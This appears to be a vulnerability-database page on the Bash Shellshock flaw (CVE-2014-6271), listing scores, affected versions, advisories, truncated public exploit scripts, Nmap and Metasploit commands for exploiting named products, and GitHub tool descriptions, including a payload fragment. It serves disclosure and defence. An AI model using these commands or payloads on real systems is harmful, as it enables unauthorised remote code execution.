
CVE-2014-6271

Published: 24/09/2014 Updated: 09/10/2019
CVSS v2 Base Score: 10 | Impact Score: 10 | Exploitability Score: 10
CVSS v3 Base Score: 9.8 | Impact Score: 5.9 | Exploitability Score: 3.9
VMScore: 1000
Vector: AV:N/AC:L/Au:N/C:C/I:C/A:C

Vulnerability Summary

GNU Bash up to and including 4.3 processes trailing strings after function definitions in the values of environment variables, which allows remote malicious users to execute arbitrary code via a crafted environment, as demonstrated by vectors involving the ForceCommand feature in OpenSSH sshd, the mod_cgi and mod_cgid modules in the Apache HTTP Server, scripts executed by unspecified DHCP clients, and other situations in which setting the environment occurs across a privilege boundary from Bash execution, aka "ShellShock." NOTE: the original fix for this issue was incorrect; CVE-2014-7169 has been assigned to cover the vulnerability that is still present after the incorrect fix.

Vulnerable Product

gnu bash 1.14.0

gnu bash 1.14.1

gnu bash 1.14.2

gnu bash 1.14.3

gnu bash 1.14.4

gnu bash 1.14.5

gnu bash 1.14.6

gnu bash 1.14.7

gnu bash 2.0

gnu bash 2.01

gnu bash 2.01.1

gnu bash 2.02

gnu bash 2.02.1

gnu bash 2.03

gnu bash 2.04

gnu bash 2.05

gnu bash 3.0

gnu bash 3.0.16

gnu bash 3.1

gnu bash 3.2

gnu bash 3.2.48

gnu bash 4.0

gnu bash 4.1

gnu bash 4.2

gnu bash 4.3

Vendor Advisories

Bash allowed bypassing environment restrictions in certain environments ...
Stephane Chazelas discovered a vulnerability in bash, the GNU Bourne-Again Shell, related to how environment variables are processed. In many common configurations, this vulnerability is exploitable over the network, especially if bash has been configured as the system shell. For the stable distribution (wheezy), this problem has been fixed in vers ...
Debian Bug report logs - #762760. bash: CVE-2014-7169: Incomplete fix for CVE-2014-6271. Package: bash; Maintainer for bash is Matthias Klose <doko@debian.org>; Source for bash is src:bash (PTS, buildd, popcon). Reported by: "brian m. carlson" <sandals@crustytoothpaste.net>. Date: Wed, 24 Sep 2014 23:45:02 UTC. Severity: ...
Tavis Ormandy discovered that the patch applied to fix CVE-2014-6271 released in DSA-3032-1 for bash, the GNU Bourne-Again Shell, was incomplete and could still allow some characters to be injected into another environment (CVE-2014-7169). With this update prefix and suffix for environment variable names which contain shell functions are added as h ...
A flaw was found in the way Bash evaluated certain specially crafted environment variables. An attacker could use this flaw to override or bypass environment restrictions to execute shell commands. Certain services and applications allow remote unauthenticated attackers to provide environment variables, allowing them to exploit this issue. We'd lik ...
A flaw was found in the way Bash evaluated certain specially crafted environment variables. An attacker could use this flaw to override or bypass environment restrictions to execute shell commands. Certain services and applications allow remote unauthenticated attackers to provide environment variables, allowing them to exploit this issue ...

Exploits

## ## This module requires Metasploit: metasploitcom/download ## Current source: githubcom/rapid7/metasploit-framework ### require 'msf/core' class MetasploitModule < Msf::Exploit::Remote include Msf::Exploit::Remote::HttpClient def initialize(info = {}) super( update_info( info, 'Name' ...
#!/usr/bin/env python # RedStar OS 30 Server (BEAM & RSSMON) shellshock exploit # ======================================================== # BEAM & RSSMON are Webmin based configuration utilities # that ship with RSS server 30 These packages are the # recommended GUI configuration components and listen on # a user specified port from 100 ...
## # This module requires Metasploit: metasploitcom/download # Current source: githubcom/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::Smtp def initialize(info={}) super(update_info(info, 'Name' => 'Qmail SMTP Bash E ...
#!/usr/bin/env python # TrendMicro InterScan Web Security Virtul Appliance # ================================================== # InterScan Web Security is a software virtual appliance that # dynamically protects against the ever-growing flood of web # threats at the Internet gateway exclusively designed to secure # you against traditional and e ...
## # This module requires Metasploit: metasploitcom/download # Current source: githubcom/rapid7/metasploit-framework ## require 'msf/core' class Metasploit4 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient def initialize(info = {}) super(update_info(info, 'Name' => 'Ad ...
#! /usr/bin/env python from socket import * from threading import Thread import thread, time, httplib, urllib, sys stop = False proxyhost = "" proxyport = 0 def usage(): print """ Shellshock apache mod_cgi remote exploit Usage: /exploitpy var=<value> Vars: rhost: victim host rport: victim port for TCP shell binding lhost: attacker ...
Vantage Point Security Advisory 2015-001 ======================================== Title: Cisco Unified Communications Manager Multiple Vulnerabilities Vendor: Cisco Vendor URL: wwwciscocom/ Versions affected: <92, <1052, <1101 Severity: Low to medium Vendor notified: Yes Reported: Oct 2014 Public release: Aug 13th, 2015 ...
<?php /* Title: Bash Specially-crafted Environment Variables Code Injection Vulnerability CVE: 2014-6271 Vendor Homepage: wwwgnuorg/software/bash/ Author: Prakhar Prasad && Subho Halder Author Homepage: prakharprasadcom && appknoxcom Date: September 25th 2014 Tested on: Mac OS X 1094/1095 with Apac ...
# Exploit Title: QNAP admin shell via Bash Environment Variable Code Injection # Date: 7 February 2015 # Exploit Author: Patrick Pellegrino | 0x700x700x650x6c0x6c0x650x670x720x690x6e0x6f@securegroupit [work] / 0x640x330x760x620x700x70@gmailcom [other] # Employer homepage: wwwsecuregroupit # Vendor homepage: wwwqnapcom # Version: ...
## # This module requires Metasploit: metasploitcom/download # Current source: githubcom/rapid7/metasploit-framework ## require 'msf/core' class Metasploit4 < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::HttpClient def initialize(info = {}) super(update_info(info, 'Name' => 'CUPS Fi ...
## # This module requires Metasploit: http//metasploitcom/download # Current source: githubcom/rapid7/metasploit-framework ## require 'msf/core' class Metasploit4 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::Ftp include Msf::Exploit::CmdStager def initialize(info = {}) super(update_info(i ...
# Exploit Title: ShellShock OpenVPN Exploit # Date: Fri Oct 3 15:48:08 EDT 2014 # Exploit Author: hobbily AKA @fj33r # Version: 2229 # Tested on: Debian Linux # CVE : CVE-2014-6271 #Probably should of submitted this the day I tweeted it ### serverconf port 1194 proto udp dev tun client-cert-not-required auth-user-pass-verify /etc/openvpn ...
# Exploit Title: PHP 5x Shellshock Exploit (bypass disable_functions) # Google Dork: none # Date: 10/31/2014 # Exploit Author: Ryan King (Starfall) # Vendor Homepage: phpnet # Software Link: phpnet/get/php-562tarbz2/from/a/mirror # Version: 5* (tested on 562) # Tested on: Debian 7 and CentOS 5 and 6 # CVE: CVE-2014-6271 < ...
require 'msf/core' class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient def initialize(info = {}) super(update_info(info, 'Name' => 'bashedCgi', 'Description' => %q{ Quick & dirty module to send the BASH ex ...
# Exploit Title: QNAP Web server remote code execution via Bash Environment Variable Code Injection # Date: 7 February 2015 # Exploit Author: Patrick Pellegrino | 0x700x700x650x6c0x6c0x650x670x720x690x6e0x6f@securegroupit [work] / 0x640x330x760x620x700x70@gmailcom [other] # Employer homepage: wwwsecuregroupit # Vendor homepage: ww ...
## # This module requires Metasploit: http//metasploitcom/download # Current source: githubcom/rapid7/metasploit-framework ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit::EXE def initialize(info = {}) super(update_info ...
Exploit Database Note: The following is an excerpt from: securityblogredhatcom/2014/09/24/bash-specially-crafted-environment-variables-code-injection-attack/ Like “real” programming languages, Bash has functions, though in a somewhat limited implementation, and it is possible to put these bash functions into environment variables Th ...
#!/usr/bin/env python # # Exploit Title : IPFire <= 215 core 82 Authenticated cgi Remote Command Injection (ShellShock) # # Exploit Author : Claudio Viviani # # Vendor Homepage : wwwipfireorg # # Software Link: downloadsipfireorg/releases/ipfire-2x/215-core82/ipfire-215i586-full-core82iso # # Date : 2014-09-29 # # Fixed v ...
#!/bin/python # Exploit Title: Shellshock SMTP Exploit # Date: 10/3/2014 # Exploit Author: fattymcwopr # Vendor Homepage: gnuorg # Software Link: ftpgnuorg/gnu/bash/ # Version: 42x < 4248 # Tested on: Debian 7 (postfix smtp server w/procmail) # CVE : 2014-6271 from socket import * import sys def usage(): print "shellshock_sm ...
# Exploit Title: Kemp Load Master - Multiple Vulnerabilities (RCE, CSRF, XSS, DoS) # Date: 01 April 2015 # Author: Roberto Suggi Liverani # Software Link: kemptechnologiescom/load-balancer/ # Version: 7116 and previous versions # Tested on: Kemp Load Master 71-16 # CVE : CVE-2014-5287/5288 Link: blogmalerischnet/2015/04/playing ...
#!/usr/bin/python # Exploit Title: dhclient shellshocker # Google Dork: n/a # Date: 10/1/14 # Exploit Author: @0x00string # Vendor Homepage: gnuorg # Software Link: ftpgnuorg/gnu/bash/bash-43targz # Version: 4311 # Tested on: Ubuntu 14041 # CVE : CVE-2014-6277,CVE-2014-6278,CVE-2014-7169,CVE-2014-7186,CVE-2014-7187 # ______ ...

Mailing Lists

GNU Bash versions 4.3 and below remote command injection exploit that leverages the REFERER header on vulnerable CGI scripts. Launches a connect-back shell. Written in Perl ...
IPFire, a free linux based open source firewall distribution, versions 2.15 Update Core 82 and below contain an authenticated remote command execution vulnerability via shellshock in the request headers ...
IPFire versions 2.15 and below core 82 authenticated CGI remote command injection exploit that leverages the bash vulnerability ...
Cisco Unified Communications Manager versions prior to 1101, 1052, and 92 suffer from multiple command execution vulnerabilities ...
This abuses the bug in bash environment variables (CVE-2014-6271) to get a suid binary inside of VMWare Fusion to launch our payload as root ...
This Metasploit module exploits the Shellshock vulnerability, a flaw in how the Bash shell handles external environment variables. This Metasploit module targets the 'ping.sh' CGI script, accessible through the Boa web server on Advantech switches. This Metasploit module was tested against firmware version 1322_D1.98 ...
AIS shellshock scanning tool that leverages the User-Agent header against a large list of possible targets. Written in C ...
This is a proof of concept that demonstrates how the Bash shellshock vulnerability can be used in PHP to bypass disable_functions, safe_mode, etc ...
bashedCgi is a quick and dirty Metasploit module to send the BASH exploit payload (CVE-2014-6271) to CGI scripts that are BASH-based or invoke BASH, to execute an arbitrary shell command ...
TrendMicro InterScan Web Security Virtual Appliance remote code execution exploit that leverages the shellshock vulnerability to spawn a connect-back shell. TrendMicro has contacted Packet Storm and provided the following link with patch information: success.trendmicro.com/solution/1105233 ...
FutureNet NXR-G240 Series remote shellshock command injection exploit ...
This is a shellshock exploit for RSSMON and BEAM, network services for Red Star OS version 30 SERVER edition ...
Due to a processing issue with environment variables it is possible to leverage bash for command execution through various methodologies ...
Staubli Jacquard Industrial System JC6 suffers from a bash environment variable handling code injection vulnerability ...
This Metasploit module exploits a post-auth code injection in specially crafted environment variables in Bash, specifically targeting CUPS filters through the PRINTER_INFO and PRINTER_LOCATION variables by default ...
This is information regarding more bash vulnerabilities and how the original bash patches are ineffective ...
DNS reverse lookups can be used as a vector of attack for the bash shellshock vulnerability ...

Nmap Scripts

http-shellshock

Attempts to exploit the "shellshock" vulnerability (CVE-2014-6271 and CVE-2014-7169) in web applications.

nmap -sV -p- --script http-shellshock <target>
nmap -sV -p- --script http-shellshock --script-args uri=/cgi-bin/bin,cmd=ls <target>

PORT   STATE SERVICE REASON
80/tcp open  http    syn-ack
| http-shellshock:
|   VULNERABLE:
|   HTTP Shellshock vulnerability
|     State: VULNERABLE (Exploitable)
|     IDs:  CVE:CVE-2014-6271
|       This web application might be affected by the vulnerability known as Shellshock. It seems the server
|       is executing commands injected via malicious HTTP headers.
|
|     Disclosure date: 2014-09-24
|     References:
|       http://www.openwall.com/lists/oss-security/2014/09/24/10
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-7169
|       http://seclists.org/oss-sec/2014/q3/685
|_      http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6271

Metasploit Modules

IPFire Bash Environment Variable Injection (Shellshock)

IPFire, a free linux based open source firewall distribution, version <= 2.15 Update Core 82 contains an authenticated remote command execution vulnerability via shellshock in the request headers.

msf > use exploit/linux/http/ipfire_bashbug_exec
msf exploit(ipfire_bashbug_exec) > show targets
    ...targets...
msf exploit(ipfire_bashbug_exec) > set TARGET <target-id>
msf exploit(ipfire_bashbug_exec) > show options
    ...show and set options...
msf exploit(ipfire_bashbug_exec) > exploit

DHCP Client Bash Environment Variable Code Injection (Shellshock)

This module exploits the Shellshock vulnerability, a flaw in how the Bash shell handles external environment variables. This module targets dhclient by responding to DHCP requests with a malicious hostname, domainname, and URL which are then passed to the configuration scripts as environment variables, resulting in code execution.

msf > use auxiliary/server/dhclient_bash_env
msf auxiliary(dhclient_bash_env) > show actions
    ...actions...
msf auxiliary(dhclient_bash_env) > set ACTION <action-name>
msf auxiliary(dhclient_bash_env) > show options
    ...show and set options...
msf auxiliary(dhclient_bash_env) > run

Advantech Switch Bash Environment Variable Code Injection (Shellshock)

This module exploits the Shellshock vulnerability, a flaw in how the Bash shell handles external environment variables. This module targets the 'ping.sh' CGI script, accessible through the Boa web server on Advantech switches. This module was tested against firmware version 1322_D1.98.

msf > use exploit/linux/http/advantech_switch_bash_env_exec
msf exploit(advantech_switch_bash_env_exec) > show targets
    ...targets...
msf exploit(advantech_switch_bash_env_exec) > set TARGET <target-id>
msf exploit(advantech_switch_bash_env_exec) > show options
    ...show and set options...
msf exploit(advantech_switch_bash_env_exec) > exploit

OS X VMWare Fusion Privilege Escalation via Bash Environment Code Injection (Shellshock)

This module exploits the Shellshock vulnerability, a flaw in how the Bash shell handles external environment variables. This module targets the VMWare Fusion application, allowing an unprivileged local user to get root access.

msf > use exploit/osx/local/vmware_bash_function_root
msf exploit(vmware_bash_function_root) > show targets
    ...targets...
msf exploit(vmware_bash_function_root) > set TARGET <target-id>
msf exploit(vmware_bash_function_root) > show options
    ...show and set options...
msf exploit(vmware_bash_function_root) > exploit

Qmail SMTP Bash Environment Variable Injection (Shellshock)

This module exploits a shellshock vulnerability on Qmail, a public domain MTA written in C that runs on Unix systems. Due to the lack of validation on the MAIL FROM field, it is possible to execute shell code on a system with a vulnerable BASH (Shellshock). This flaw works on the latest Qmail versions (qmail-1.03 and netqmail-1.06). However, in order to execute code, /bin/sh has to be linked to bash (usually default configuration) and a valid recipient must be set on the RCPT TO field (usually admin@exampledomain.com). The exploit does not work on the "qmailrocks" community version as it ensures the MAILFROM field is well-formed.

msf > use exploit/unix/smtp/qmail_bash_env_exec
msf exploit(qmail_bash_env_exec) > show targets
    ...targets...
msf exploit(qmail_bash_env_exec) > set TARGET <target-id>
msf exploit(qmail_bash_env_exec) > show options
    ...show and set options...
msf exploit(qmail_bash_env_exec) > exploit

Pure-FTPd External Authentication Bash Environment Variable Code Injection (Shellshock)

This module exploits the Shellshock vulnerability, a flaw in how the Bash shell handles external environment variables. This module targets the Pure-FTPd FTP server when it has been compiled with the --with-extauth flag and an external Bash script is used for authentication. If the server is not set up this way, the exploit will fail, even if the version of Bash in use is vulnerable.

msf > use exploit/multi/ftp/pureftpd_bash_env_exec
msf exploit(pureftpd_bash_env_exec) > show targets
    ...targets...
msf exploit(pureftpd_bash_env_exec) > set TARGET <target-id>
msf exploit(pureftpd_bash_env_exec) > show options
    ...show and set options...
msf exploit(pureftpd_bash_env_exec) > exploit

Dhclient Bash Environment Variable Injection (Shellshock)

This module exploits the Shellshock vulnerability, a flaw in how the Bash shell handles external environment variables. This module targets dhclient by responding to DHCP requests with a malicious hostname, domainname, and URL which are then passed to the configuration scripts as environment variables, resulting in code execution. Due to length restrictions and the unusual networking scenario at the time of exploitation, this module achieves code execution by writing the payload into /etc/crontab and then cleaning it up after a session is created.

msf > use exploit/unix/dhcp/bash_environment
msf exploit(bash_environment) > show targets
    ...targets...
msf exploit(bash_environment) > set TARGET <target-id>
msf exploit(bash_environment) > show options
    ...show and set options...
msf exploit(bash_environment) > exploit

Apache mod_cgi Bash Environment Variable Code Injection (Shellshock)

This module exploits the Shellshock vulnerability, a flaw in how the Bash shell handles external environment variables. This module targets CGI scripts in the Apache web server by setting the HTTP_USER_AGENT environment variable to a malicious function definition.

msf > use exploit/multi/http/apache_mod_cgi_bash_env_exec
msf exploit(apache_mod_cgi_bash_env_exec) > show targets
    ...targets...
msf exploit(apache_mod_cgi_bash_env_exec) > set TARGET <target-id>
msf exploit(apache_mod_cgi_bash_env_exec) > show options
    ...show and set options...
msf exploit(apache_mod_cgi_bash_env_exec) > exploit

Apache mod_cgi Bash Environment Variable Injection (Shellshock) Scanner

This module scans for the Shellshock vulnerability, a flaw in how the Bash shell handles external environment variables. This module targets CGI scripts in the Apache web server by setting the HTTP_USER_AGENT environment variable to a malicious function definition. PROTIP: Use exploit/multi/handler with a PAYLOAD appropriate to your CMD, set ExitOnSession false, run -j, and then run this module to create sessions on vulnerable hosts. Note that this is not the recommended method for obtaining shells. If you require sessions, please use the apache_mod_cgi_bash_env_exec exploit module instead.

msf > use auxiliary/scanner/http/apache_mod_cgi_bash_env
msf auxiliary(apache_mod_cgi_bash_env) > show actions
    ...actions...
msf auxiliary(apache_mod_cgi_bash_env) > set ACTION <action-name>
msf auxiliary(apache_mod_cgi_bash_env) > show options
    ...show and set options...
msf auxiliary(apache_mod_cgi_bash_env) > run

CUPS Filter Bash Environment Variable Code Injection (Shellshock)

This module exploits the Shellshock vulnerability, a flaw in how the Bash shell handles external environment variables. This module targets CUPS filters through the PRINTER_INFO and PRINTER_LOCATION variables. A valid username and password is required to exploit this vulnerability through CUPS.

msf > use exploit/multi/http/cups_bash_env_exec
msf exploit(cups_bash_env_exec) > show targets
    ...targets...
msf exploit(cups_bash_env_exec) > set TARGET <target-id>
msf exploit(cups_bash_env_exec) > show options
    ...show and set options...
msf exploit(cups_bash_env_exec) > exploit

Github Repositories

BSY bonus task report. This report describes step by step solution of bonus task present in Security Systems course on Czech Technical University. First stage: We are receiving a pcap file, unique token, and server information as the entry point to this assignment — the pcap file you can find in this repo. Other provided information is listed below. server: 1921681167:

reading course

cve-2014-6271-huan-lu reading course

Attack Defend Exercise for Computer System Security

CSEC-742-Project: Attack Defend Exercise for Computer System Security (RIT CSEC-742). Gain understanding and experience with vulnerabilities and exploitation. Construct a vulnerable system for others to attack and configure a monitoring system to observe attacks. Set up a VM, configure it to be susceptible to an exploit, and connect it to the private subnet in the RIT Virtual Lab

This Repo Contains Write-UPs for all Tasks

CTF tools & Resources This Repo Contains Write-UPs for all Tasks HERE ARE SOME EXTREMELY USEFUL TOOLS AND COMMANDS Forensics, Linux Tools and Commands Web Misc OSINT Basic linux tools and Commands binwalk -e : //Extracts hidden files steghide extract -sf : //Extracts hidden text in the image xxd : //Prints the Hex version of file grep "element" //finds the

WebApp Honeypot for detecting Shell Shock exploit attempts

Shockpot: Shockpot is a web app honeypot designed to find attackers attempting to exploit the Bash remote code vulnerability, CVE-2014-6271. Shockpot can be run as a standalone honeypot or easily deployed by Modern Honey Network (MHN): github.com/Pwnlandia/mhn Installation: virtualenv env env/bin/activate pip install -r requirements.txt Configuration: Edit shockpot.conf

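A collection of some of the better open-source security projects, to help in-house security practitioners build enterprise security capabilities.

Project introduction: This is a list of open-source security projects, collecting some of the better ones to help in-house security practitioners build enterprise security capabilities. Each of these open-source projects is dedicated to solving some security problem. Approach to collecting projects: one is to follow the open-source security projects of Internet companies and teams; having been put into practice inside those companies, these best practices are worth learning from.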

A simple python shell-like exploit for the Shellshock CVE-2014-6271 bug.

shellshock-shell: A simple python shell-like exploit for the Shellshock CVE-2014-6271 bug. Use it to exploit known vulnerable URLs. This tool may be used only on your own authorized URLs. The author of this tool takes no responsibility for its usage. File name: shellshockpy Author: Sagi Levy - Sagi@pwnguycom Date created: 27/09/2014 Python Version: 27 Example: /shellshockpy

Common Vulnerabilities and Exposures DB and Python API

CVE DB About: CVE DB is a sqlite DB with CVEs and Python API. CVEs are scraped from CVE Details. Latest DB is from 17012017. Why? It seems there is no developer friendly CVE data available. Usage DB: Download latest sqlite DB from dbs and extract. Python Updating DB with open('csv_listtxt', 'r') as csv_h: with CVE_DB() as db: for cve_na

Ansible role that configures a host to be a target in a cyber range

cyber-range-target This role endeavors to simplify building a host for a cyber range This role is for assessment purposes only Note: This has the potential to render a host vulnerable Use with care Requirements Ansible 24 Role Variables --- # defaults file for cyber-range-target # Which CVE's should be tested on a host cves_to_test: [] selinux_state: enforcing Depe

This is an Android Application that helps you detect if your machine that runs bash is vulnerable to CVE-2014-6271

shellshocker-android: This is an Android Application that helps you detect if your machine that runs bash is vulnerable to CVE-2014-6271. Stefano Belli, <(C) Copyleft, share, rebuild, modify, redistribute as you think it should be better. Google+: plusgooglecom/+StefanoBelli WebSite: wwwinthebitit Next update ready, I will upload nextly

Python library and utility for CVE-2014-6271 (aka. "shellshock")

pyshellshock Python library and utility for CVE-2014-6271

Python Scanner for "ShellShock" (CVE-2014-6271)

shellshock_scanner Python Scanner for "ShellShock" (CVE-2014-6271)

Tutorials Exploit Shellshock Vulnerability CVE 2014-6271 using Metasploit 11 Best Linux Distros for Ethical Hacking and Pentesting in 2020 Getting Started with Metasploit for Ethical Hacking Top 20 Most used Hacking and Pentesting Tools How to Route All Traffic Through Tor Network on Arch Linux Remote Network Penetration via Netbios using Linux and Samba How to Extract Data fr

Tutorials Exploit Shellshock Vulnerability CVE 2014-6271 using Metasploit

shellshock CVE-2014-6271 CGI Exploit, Use like Openssh via CGI

CGIShell shellshock CVE-2014-6271 CGI Exploit Use like OpenSSH via CGI Page Use python cgishellpy 'wwwgooglecom/cve-2014-6271/poccgi' Screenshot Dependence Windows needed pyreadline It is not needed chardet Future Add TestCase HTTP Login Support http transmission gzip compression chardet identify and decode any bug fix Issues Windows Untest

exploit-CVE-2014-6271 docker run --rm -d -p <port>:80 vulnerables/cve-2014-6271 sh exploit-clish <ip> <port> <command>

North Korea ICT 1 North Korea Internet 2 Redstar OS and Browser Redstar PC Redstar Server RedStar 30 Server - 'Shellshock' 'BEAM' / 'RSSMON' Command Injection [Exploit DB] wwwexploit-dbcom/exploits/40938/ [CVE-2014-6271] cvemitreorg/cgi-bin/cvenamecgi?name=cve-2014-6271 3 Security "See swsecurityml

Most Wanted Private and Public PHP Web Shells Can Be Downloaded Here. (Educational Purpose Only)

NOTICE DO NOT DOWNLOAD SHELLS FROM EXPLOIT OR PHPSHELL: All Web Shells Located at websites mentioned below are infected Exploit PHPShell The stuff they will download with their shells is listed below lamer Email address they used to collect logs is byhero44@gmailcom All shells from above mentioned sites send email to this email address instantly with your infected url a

Awesome Penetration Testing A collection of awesome penetration testing resources Online Resources Penetration Testing Resources Exploit development Social Engineering Resources Lock Picking Resources Tools Penetration Testing Distributions Basic Penetration Testing Tools Docker for Penetration Testing Vulnerability Scanners Network Tools Wireless Network Tools SSL Analysi

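A collection of awesome software, libraries, documents, books, resources and cool stuff about security.

Awesome Security: A collection of awesome software, libraries, documents, books, resources and cool stuff about security. Inspired by awesome-php, awesome-python. Thanks to all contributors, you're awesome and wouldn't be possible without you! The goal is to build a categorized community-driven collection of very well-known resources. Awesome Security Network Scann

Penetration-testing syntax. A collection of vulnerability study material, exploitation methods and techniques. Common web vulnerabilities: injection (HTML injection / code injection / header injection (CRLF) / SQL injection / XML injection (XXE/WSDL)), cross-site scripting (XSS), security misconfiguration, login and authentication flaws, privilege bypass, sensitive information disclosure, lax access control, request forgery (CSRF), use of components with known vulnerabilities, clickjacking, SSRF. Contents Ha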

Bonus assignment for BSY

Bonus assignment. Author: Tomáš Hořovský. Email: horovtom@fel.cvut.cz. This was the final bonus assignment for the BSY course at ČVUT Prague. As an entry point for this assignment, we got a pcap file and an IP address of submission server. Part 1: First, I went to the submission server and entered some random data to get all the different questions: What is

Ansible role to check the CVE-2014-6271 vulnerability

bash-fix-exploit: A tiny role that checks to see if the CVE-2014-6271 exploit is still valid. Use at your own risk. Read about the exploit here: community.rapid7.com/community/infosec/blog/2014/09/25/bash-ing-into-your-network-investigating-cve-2014-6271 Requirements: Assumes that you're using bash as your shell. Role Variables: update_bash - defaults to "no

Shell Shock CVE-6271 test script

ss-6271: Shell Shock CVE-6271 test script. This quickly-written script comes pre-packed with the October 2015 release update of Weakerthan Linux 6. I coded it after taking the Pentesterlab's course on CVE-6271 Shell Shock: (pentesterlab.com/exercises/cve-2014-6271/course) dependencies: gnome-terminal, nc, Bash


Leverage many injection methods for Shellshock.

Evil-Shock Description: Evil-Shock is a powerful tool made to exploit Shellshock. What's special with Evil-Shock is that it doesn't base its attacks on one parameter; for example, another tool might inject a simple "echo Vulnerable" and see if the server executes that. In many cases the server won't execute that command but can execute another command ;) Evil-Shock

This is an individual assignment for secure network programming

CVE-2014-6271-Shellshock- This is an individual assignment for secure network programming

A multifunctional tool for checking and exploiting the Shellshock (a.k.a. Bashd00r) vulnerability. CVE 2014-6271. Created for Python 2.7.13.

SwissArmyShellshocker: A multifunctional tool for checking and exploiting the Shellshock (a.k.a. Bashd00r) vulnerability. CVE 2014-6271

OS X bash-3.2 fix (with import-functions patch)

bash-32 for OS X 109 and 1010 NOTE WELL: This software is not applicable to 1011 unless disabling the File System Protections GNU bash for OS X Current version: 3257 NOTE: EXPERIMENTAL: functions from environment variables are NOT imported as default when the import-functions option is compiled The master branch has this option enabled, for better security You can v

Real time analysis of information security vulnerabilities

Security Threats and Analysis Real-time analysis of information security vulnerabilities Threat Name CVE-2014-6271 ShellShock

CVE-2014-6271 Usage go run CVE-2014-6271go wwwexamplecom 80 whoami


Chef cookbook that will fail if bash vulnerability found per CVE-2014-6271

bash-CVE-2014-6271 Cookbook: This Chef cookbook contains a default recipe that will fail your Chef run if a bash is found and that bash is vulnerable to the remote exploit described in CVE-2014-6271. The places to look for bash can be configured in the node['bash-CVE-2014-6271']['bashes'] attribute (see below). Requirements: Should work on any UNIX/Linux. Pleas

another_shellshock_test Some scripts to test for the "ShellShock" vulnerability (CVE-2014-6271). The codename for these scripts is SHIT (SHellshock Injection Test) harrharr. Please only use this script in environments where you are allowed to. shellshock_local.sh: Test for the two known (by me) versions of this vulnerability on the local system: env x='() { :;}; ec

Shellshock scanner for Apache MOD_CGI

Shellshock Burp Plugin: A burp plugin to provide active scanning for CVE-2014-6271 against Apache's MOD_CGI. Download: Compiled to Java 6 for luddites and the like. Download here! Building: mvn package

An example on how to use Ansible to update your servers

update Bash on Debian / Ubuntu and RedHat. I copied this code from raymii.org/s/articles/Patch_CVE-2014-6271_Shellshock_with_Ansible.html. Thanks to Remy van Elst for writing this code. I wanted to learn Ansible for a while now and this example was really helpful. If you want to make this work for your servers, you'll need to have an Ansible Inventory F

bro-scripts Find us on the web at www.CriticalStack.com. Check out our new Intel Marketplace for Bro. Repository includes a set of Bro scripts to be shared with the community. CVE-2014-6271 Exploit Detector: The CVE-2014-6271 vulnerability in the venerable Bourne-Again SHell (BASH) is rated as a Level 10 allowing full, unauthenticated remote access to your systems; it's g

A script, in C, to check if CGI scripts are vulnerable to CVE-2014-6271 (The Bash Bug)

ShellShock-CGI-Scan A script, in C, to check if CGI scripts are vulnerable to CVE-2014-6271 (The Bash Bug). Options: -i (local ip-address) -p (port to listen) -l (site list) -t (connection timeout) (Default: 15s). Example: $ ./Scanner -i 127.0.0.1 -p 31337 -l sites.txt -t 5 Starting listen in localhost on port 31337, scan sites in file 'sites.txt', and set connecti

A python script to enumerate CGI scripts vulnerable to CVE-2014-6271 on one specific server

shellshock-cgi A python script to enumerate CGI scripts vulnerable to CVE-2014-6271 on one specific server Usage $ python testingpy --server 17216255130 --listen 172162551 ##Example Return: [+] Testing if 17216255130 is vulnerable to CVE-2014-6271 via CGI [+] Listening for incoming connections on the following socket 172162551:4443 [!] The server is vulnerable a

CVE-2014-6271 Bash Shellshock (and Aftershock) Tester for Ansible. Install Ansible: docs.ansible.com/intro_installation.html. Add servers to inventory file (example): username@ip. Copy your public key to remote servers' .ssh/authorized_keys. Execute test: $ ansible-playbook -i inventory site.yml

A scanner for SIP proxies vulnerable to Shellshock

A scanner for SIP proxies vulnerable to Shellshock. Usage: sipshock [ Flags ] [ IP Addresses ] Usage flags: lhost : Local listening address lport : Local listening port (default 10111) rport : Remote port (default 5060). The exec module in Kamailio, Opensips and probably every other SER fork passes the received SIP headers as environment variables to the invoking shell. This

Shellshock Remote Command Execution

Shellshock ( Bash CVE-2014-6271 ) Remote Command Execution Injector. Overview: A critical vulnerability has been reported in the GNU Bourne-Again Shell (Bash), the common command-line shell used in many Linux/UNIX operating systems and Apple’s Mac OS X. The flaw could allow an attacker to remotely execute shell commands by attaching malicious code in environment variables u

cve-2014-6271

CVE-2014-6271 This is part of Cved: a tool to manage vulnerable docker containers. Cved: gitlab.com/git-rep/cved Image source: github.com/cved-sources/cve-2014-6271 Image author: github.com/Medicean/VulApps/tree/master/b/bash/shellshock1_CVE-2014-6271

Shellshock-Bash-Remote-Code-Execution-Vulnerability-and-Exploitation Before moving into the Shellshock vulnerability, everyone should know about the bash environment, so let's move on to bash. When your computer boots up, the kernel will identify each and every piece of hardware and every component that is enabled. Each and every computer that uses a UNIX kernel will have this shell

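Project introduction: This is a list of open-source security projects. It collects some of the better open-source security projects to help in-house security practitioners build enterprise security capabilities. Each of these open-source projects is working to solve some security problem. How projects are collected: one approach is to follow the open-source security projects of internet companies and teams; having been put into practice inside those companies, these best practices are worth learning from.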

CVE-2014-6271

Using google to scan sites for "ShellShock" (CVE-2014-6271)

Prerequisite: sudo pip install shell; install google python search github.com/MarioVilas/google. Run: I use google to search first 1000 sites and try to get the /etc/passwd. After testing, there are many many many hosts that can be rooted!!!! By the way, this is only a proto, it has false positives. Output like this: if second field is !!!, then You Can Get SHELL! $ python

XSHOCK Shellshock Exploit

xShock ShellShock. Written by Hulya Karabag. Version 100. xShock ShellShock (CVE-2014-6271). This tool exploits shellshock. Instagram: Capture the Root. Screenshots. How to use: Click on the image. Read Me: All found directories will be saved in vulnurl.txt file. The results of the executed commands are saved in response.txt. Features: This tool includes:

A series of scripts written around 2014/15. Made purely for fun and learning.

